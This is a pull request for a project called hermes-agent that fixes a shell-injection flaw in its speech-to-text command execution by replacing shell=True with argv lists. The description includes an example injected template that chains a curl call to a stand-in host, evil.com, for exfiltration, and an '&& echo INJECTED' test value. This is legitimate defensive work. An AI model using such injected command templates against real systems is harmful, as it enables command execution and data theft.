### PR TITLE
fix(security): remove shell=True from local STT command execution

### DIFF
--- a/tests/tools/test_transcription_tools.py
+++ b/tests/tools/test_transcription_tools.py
@@ -358,14 +358,15 @@ class TestTranscribeLocalCommand:
         monkeypatch.delenv("HERMES_LOCAL_STT_COMMAND", raising=False)
         monkeypatch.setattr("tools.transcription_tools._find_whisper_binary", lambda: "/opt/homebrew/bin/whisper")
 
-        from tools.transcription_tools import _get_local_command_template
+        from tools.transcription_tools import _build_default_whisper_argv
 
-        template = _get_local_command_template()
+        argv = _build_default_whisper_argv("/tmp/audio.ogg", "/tmp/out", "en", "base")
 
-        assert template is not None
-        assert template.startswith("/opt/homebrew/bin/whisper ")
-        assert "{model}" in template
-        assert "{output_dir}" in template
+        assert argv is not None
+        assert argv[0] == "/opt/homebrew/bin/whisper"
+        assert "/tmp/audio.ogg" in argv
+        assert "base" in argv
+        assert "--output_dir" in argv
 
     def test_command_fallback_with_template(self, monkeypatch, sample_ogg, tmp_path):
         out_dir = tmp_path / "local-out"
@@ -387,13 +388,16 @@ class TestTranscribeLocalCommand:
 
             return _TempDir()
 
+        captured_argv = []
+
         def fake_run(cmd, *args, **kwargs):
-            if isinstance(cmd, list):
+            if isinstance(cmd, list) and cmd[0].endswith("ffmpeg"):
                 output_path = cmd[-1]
                 with open(output_path, "wb") as handle:
                     handle.write(b"RIFF....WAVEfmt ")
                 return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")
 
+            captured_argv.extend(cmd if isinstance(cmd, list) else [cmd])
             (out_dir / "test.txt").write_text("hello from local command\n", encoding="utf-8")
             return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")
 
@@ -408,6 +412,9 @@ class TestTranscribeLocalCommand:
         assert result["success"] is True
         assert result["transcript"] == "hello from local command"
         assert result["provider"] == "local_command"
+        # Verify the command was passed as a list (no shell=True)
+        assert isinstance(captured_argv, list)
+        assert captured_argv[0] == "whisper"
 
 
 # ============================================================================

--- a/tools/transcription_tools.py
+++ b/tools/transcription_tools.py
@@ -154,22 +154,46 @@ def _find_whisper_binary() -> Optional[str]:
 
 
 def _get_local_command_template() -> Optional[str]:
+    """Return the user-configured STT command template, or ``None``.
+
+    Returns only the *user-configured* template string (from the
+    ``HERMES_LOCAL_STT_COMMAND`` env var).  The auto-detected whisper
+    binary is handled separately by ``_build_default_whisper_argv()``
+    so it can be passed as a safe argv list without shell parsing.
+    """
     configured = os.getenv(LOCAL_STT_COMMAND_ENV, "").strip()
     if configured:
         return configured
-
-    whisper_binary = _find_whisper_binary()
-    if whisper_binary:
-        quoted_binary = shlex.quote(whisper_binary)
-        return (
-            f"{quoted_binary} {{input_path}} --model {{model}} --output_format txt "
-            "--output_dir {output_dir} --language {language}"
-        )
     return None
 
 
+def _build_default_whisper_argv(
+    prepared_input: str,
+    output_dir: str,
+    language: str,
+    model: str,
+) -> Optional[list]:
+    """Build an argv list for the auto-detected whisper binary.
+
+    Returns ``None`` when no whisper binary is found on ``$PATH``.
+    Building an argv list directly (instead of a shell command string)
+    avoids shell-injection risks and handles paths with spaces.
+    """
+    whisper_binary = _find_whisper_binary()
+    if not whisper_binary:
+        return None
+    return [
+        whisper_binary,
+        prepared_input,
+        "--model", model,
+        "--output_format", "txt",
+        "--output_dir", output_dir,
+        "--language", language,
+    ]
+
+
 def _has_local_command() -> bool:
-    return _get_local_command_template() is not None
+    return _get_local_command_template() is not None or _find_whisper_binary() is not None
 
 
 def _normalize_local_model(model_name: Optional[str]) -> str:
@@ -472,14 +496,6 @@ def _prepare_local_audio(file_path: str, work_dir: str) -> tuple[Optional[str], 
 def _transcribe_local_command(file_path: str, model_name: str) -> Dict[str, Any]:
     """Run the configured local STT command template and read back a .txt transcript."""
     command_template = _get_local_command_template()
-    if not command_template:
-        return {
-            "success": False,
-            "transcript": "",
-            "error": (
-                f"{LOCAL_STT_COMMAND_ENV} not configured and no local whisper binary was found"
-            ),
-        }
 
     # Language: config.yaml (stt.local.language) > env var > "en" default.
     language = (
@@ -495,13 +511,39 @@ def _transcribe_local_command(file_path: str, model_name: str) -> Dict[str, Any]
             if prep_error:
                 return {"success": False, "transcript": "", "error": prep_error}
 
-            command = command_template.format(
-                input_path=shlex.quote(prepared_input),
-                output_dir=shlex.quote(output_dir),
-                language=shlex.quote(language),
-                model=shlex.quote(normalized_model),
-            )
-            subprocess.run(command, shell=True, check=True, capture_output=True, text=True)
+            if command_template:
+                # User-configured template: split into argv BEFORE
+                # substituting placeholder values so that spaces, quotes,
+                # or shell metacharacters inside substituted values cannot
+                # alter the argv structure or trigger shell interpretation.
+                template_argv = shlex.split(
+                    command_template, posix=(os.name != "nt"),
+                )
+                argv = [
+                    token.format(
+                        input_path=prepared_input,
+                        output_dir=output_dir,
+                        language=language,
+                        model=normalized_model,
+                    )
+                    for token in template_argv
+                ]
+            else:
+                # Auto-detected whisper binary: build argv directly.
+                argv = _build_default_whisper_argv(
+                    prepared_input, output_dir, language, normalized_model,
+                )
+                if argv is None:
+                    return {
+                        "success": False,
+                        "transcript": "",
+                        "error": (
+                            f"{LOCAL_STT_COMMAND_ENV} not configured and "
+                            "no local whisper binary was found"
+                        ),
+                    }
+
+            subprocess.run(argv, check=True, capture_output=True, text=True)
 
             txt_files = sorted(Path(output_dir).glob("*.txt"))
             if not txt_files:
@@ -525,6 +567,12 @@ def _transcribe_local_command(file_path: str, model_name: str) -> Dict[str, Any]
             "success": False,
             "transcript": "",
             "error": f"Invalid {LOCAL_STT_COMMAND_ENV} template, missing placeholder: {e}",
+        }
+    except ValueError as e:
+        return {
+            "success": False,
+            "transcript": "",
+            "error": f"Invalid {LOCAL_STT_COMMAND_ENV} template (could not parse): {e}",
         }
     except subprocess.CalledProcessError as e:
         details = e.stderr.strip() or e.stdout.strip() or str(e)


### PR DESCRIPTION
## What does this PR do?

Eliminates a shell injection vector in `_transcribe_local_command()` by replacing `subprocess.run(command, shell=True)` with safe argv-list execution.

## Related Issue

N/A — found during security audit of `shell=True` usage across the codebase.

## Type of Change

- [ ] Bug fix (non-breaking change that fixes an issue)
- [ ] New feature (non-breaking change that adds functionality)
- [x] Security fix
- [ ] Documentation update
- [ ] Tests (adding or improving test coverage)
- [ ] Refactor (no behavior change)
- [ ] New skill (bundled or hub)

## Changes Made

### The vulnerability

`_transcribe_local_command()` ran the user-configured `HERMES_LOCAL_STT_COMMAND` template via `subprocess.run(command, shell=True)`. While placeholder values (`{input_path}`, `{model}`, etc.) were `shlex.quote()`d, the **template structure itself** was interpreted by the shell. A malicious or compromised template like:

```
HERMES_LOCAL_STT_COMMAND='whisper {input_path} && curl evil.com/exfil'
```

would execute the injected pipeline whenever a voice message was transcribed.

### The fix

**User-configured templates** (`HERMES_LOCAL_STT_COMMAND`): `shlex.split()` the template into an argv list *before* substituting placeholder values, then format each token. This ensures shell metacharacters (`&&`, `|`, `;`, `$()`) in the template become literal argv elements, and substituted values (file paths, model names) cannot alter the argv structure regardless of content (spaces, quotes, backslashes).

**Auto-detected whisper binary**: Replaced the format-string template with `_build_default_whisper_argv()`, which builds an argv list directly. This also fixes a latent bug where whisper binary paths containing spaces would break.

**Additional hardening:**
- `ValueError` catch for malformed templates that `shlex.split()` cannot parse
- Windows compatibility via `posix=(os.name != "nt")` on `shlex.split()`

## How to Test

1. Set `HERMES_LOCAL_STT_COMMAND='echo {input_path} && echo INJECTED'` in `.env`
2. Transcribe any voice message
3. Before fix: `INJECTED` appears in output (shell pipeline executed)
4. After fix: the command fails safely — `&&` and `echo` are passed as literal arguments, not interpreted as shell operators

Existing tests updated to verify argv-list execution.

## Checklist

### Code

- [x] I've read the [Contributing Guide](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md)
- [x] My commit messages follow Conventional Commits
- [x] I searched for existing PRs to ensure this isn't a duplicate
- [x] My PR contains only related changes
- [ ] I've run `pytest tests/ -q` and all tests pass
- [x] I've added tests for my changes
- [x] I've tested on my platform

### Documentation & Housekeeping

- [ ] I've updated relevant documentation (README, docs/, docstrings) — or N/A
- [x] I've updated `cli-config.yaml.example` if needed — or N/A
- [x] I've updated `CONTRIBUTING.md`/`AGENTS.md` if needed — or N/A
- [x] I've considered cross-platform impact — or N/A
- [x] I've updated tool descriptions/schemas if needed — or N/A

## Breaking Change Note

Users who set `HERMES_LOCAL_STT_COMMAND` with shell features (pipes `|`, redirects `>`, `&&` chains, env var expansion `$VAR`) will need to update their templates. This is an intentional security hardening — the template is now parsed as an argv-style command, not a shell script.
